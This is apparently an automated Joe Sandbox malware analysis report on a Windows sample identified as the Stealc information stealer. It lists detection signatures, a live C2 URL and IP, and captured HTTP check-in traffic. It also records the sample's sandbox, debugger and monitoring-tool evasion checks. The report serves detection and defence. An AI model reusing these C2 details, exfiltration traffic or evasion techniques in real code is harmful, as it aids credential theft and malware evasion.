Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1540694
MD5:c85bd4b2ad207a44d2cf47f0b48d6d09
SHA1:3d20ea5592b7742bf5a05c166aa3e18c9d187681
SHA256:294ee8a1545ecad7c74a8994fd7cd56acbdf3694ee80a77ba33e12c0067717d7
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7400 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C85BD4B2AD207A44D2CF47F0B48D6D09)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1705479023.0000000004DD0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7400JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7400JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.340000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-24T01:10:02.998180+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.340000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0034C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0034C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00347240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00347240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00349AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00349AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00349B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00349B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00358EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00358EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_003538B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00354910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00354910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0034DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0034DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0034E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0034E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0034ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0034ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00354570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00354570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0034DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0034DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0034BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0034BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0034F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0034F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00353EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00353EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003416D0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECGCBGDBKJJKEBFBFHHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 38 37 31 34 44 39 39 42 30 32 31 32 32 35 36 38 36 33 31 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 2d 2d 0d 0a Data Ascii: ------JJECGCBGDBKJJKEBFBFHContent-Disposition: form-data; name="hwid"8E8714D99B021225686314------JJECGCBGDBKJJKEBFBFHContent-Disposition: form-data; name="build"doma------JJECGCBGDBKJJKEBFBFH--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00344880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00344880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECGCBGDBKJJKEBFBFHHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 38 37 31 34 44 39 39 42 30 32 31 32 32 35 36 38 36 33 31 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 2d 2d 0d 0a Data Ascii: ------JJECGCBGDBKJJKEBFBFHContent-Disposition: form-data; name="hwid"8E8714D99B021225686314------JJECGCBGDBKJJKEBFBFHContent-Disposition: form-data; name="build"doma------JJECGCBGDBKJJKEBFBFH--
                Source: file.exe, 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1746396519.0000000000FF7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1746396519.0000000000FE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1746396519.0000000000FF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php6
                Source: file.exe, 00000000.00000002.1746396519.0000000001011000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php=
                Source: file.exe, 00000000.00000002.1746396519.0000000000FF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php?
                Source: file.exe, 00000000.00000002.1746396519.0000000000FE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phph
                Source: file.exe, 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37=

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007010F40_2_007010F4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006070F30_2_006070F3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC9B50_2_005EC9B5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00632A960_2_00632A96
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071035F0_2_0071035F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B43DE0_2_005B43DE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00711BD70_2_00711BD7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00707C290_2_00707C29
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B34C60_2_005B34C6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060BCC80_2_0060BCC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0076ACA00_2_0076ACA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00648DAB0_2_00648DAB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C0D8F0_2_006C0D8F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EDE770_2_007EDE77
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070966C0_2_0070966C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007046250_2_00704625
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A17DD0_2_007A17DD
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 003445C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: xisdcata ZLIB complexity 0.9949372386961908
                Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: file.exe, 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1705479023.0000000004DD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00359600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00359600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00353720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00353720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\T1OZWGAW.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1809408 > 1048576
                Source: file.exeStatic PE information: Raw size of xisdcata is bigger than: 0x100000 < 0x193a00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.340000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xisdcata:EW;bazuxvkp:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xisdcata:EW;bazuxvkp:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00359860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00359860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c5de1 should be: 0x1c6936
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: xisdcata
                Source: file.exeStatic PE information: section name: bazuxvkp
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0035B035 push ecx; ret 0_2_0035B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0076D012 push eax; mov dword ptr [esp], edx0_2_0076D05A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0076D012 push 7FECB9A0h; mov dword ptr [esp], edx0_2_0076D081
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E7014 push 55D365F6h; mov dword ptr [esp], esi0_2_007E707D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E7014 push 31CB389Bh; mov dword ptr [esp], edx0_2_007E7114
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007010F4 push 4CED349Fh; mov dword ptr [esp], ebx0_2_00701113
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007010F4 push 4CC958F3h; mov dword ptr [esp], ecx0_2_0070111D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007010F4 push eax; mov dword ptr [esp], edx0_2_007012F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007010F4 push eax; mov dword ptr [esp], edx0_2_00701314
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007010F4 push ebx; mov dword ptr [esp], edx0_2_0070137C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007010F4 push 38C6E934h; mov dword ptr [esp], esi0_2_007013CA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007010F4 push ebp; mov dword ptr [esp], 2AD17891h0_2_00701428
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007010F4 push edx; mov dword ptr [esp], 56D69300h0_2_00701497
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007010F4 push edx; mov dword ptr [esp], esi0_2_007014D8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007010F4 push ebp; mov dword ptr [esp], edi0_2_00701518
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007010F4 push 6DFF3FD2h; mov dword ptr [esp], esp0_2_00701535
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007010F4 push edi; mov dword ptr [esp], 4F8DFF09h0_2_007015EA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007010F4 push 6C6DF282h; mov dword ptr [esp], ebx0_2_00701743
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007010F4 push 3680CF58h; mov dword ptr [esp], ecx0_2_0070174B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007010F4 push edi; mov dword ptr [esp], 5EEFCDE9h0_2_007017CD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007010F4 push esi; mov dword ptr [esp], ebx0_2_007017F7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007010F4 push edi; mov dword ptr [esp], 3DFBA0E5h0_2_007017FC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007010F4 push edi; mov dword ptr [esp], 4CB923CBh0_2_0070181A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007010F4 push esi; mov dword ptr [esp], 7B2D27BAh0_2_0070184F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007010F4 push ebp; mov dword ptr [esp], esi0_2_007018E7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007010F4 push 0FD4743Eh; mov dword ptr [esp], edi0_2_0070198D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007010F4 push ecx; mov dword ptr [esp], edx0_2_00701A77
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007010F4 push ebx; mov dword ptr [esp], 6E5BD191h0_2_00701AFA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007010F4 push 397CBF65h; mov dword ptr [esp], eax0_2_00701B85
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007010F4 push edx; mov dword ptr [esp], 16EDE921h0_2_00701C3D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007010F4 push 3657D360h; mov dword ptr [esp], ebx0_2_00701CAC
                Source: file.exeStatic PE information: section name: xisdcata entropy: 7.953663128653993

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00359860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00359860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13265
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A2269 second address: 5A2286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA94618479h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A2286 second address: 5A228A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715A53 second address: 715A76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618471h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push edi 0x0000000b jp 00007FCA94618468h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715A76 second address: 715A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715A7C second address: 715A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715D74 second address: 715D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715EB6 second address: 715EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FCA94618466h 0x0000000f rdtsc
